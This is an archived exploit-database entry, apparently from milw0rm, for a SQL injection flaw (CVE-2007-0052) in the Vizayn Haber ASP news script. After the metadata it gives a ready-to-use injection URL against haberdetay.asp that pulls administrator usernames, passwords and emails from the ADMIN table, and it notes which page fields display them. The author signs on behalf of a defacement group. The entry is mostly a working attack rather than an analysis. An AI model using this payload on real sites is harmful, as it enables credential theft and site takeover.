Vizayn Haber - 'haberdetay.asp?id' SQL Injection

Author: chernobiLe
type: webapps
platform: asp
port: 
date_added: 2006-12-31 
date_updated: 2016-09-21 
verified: 1 
codes: OSVDB-31518;CVE-2007-0052 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comvizaynhaber.zip

###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of Vizayn Haber : http://aspindir.com/goster/4623


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-01]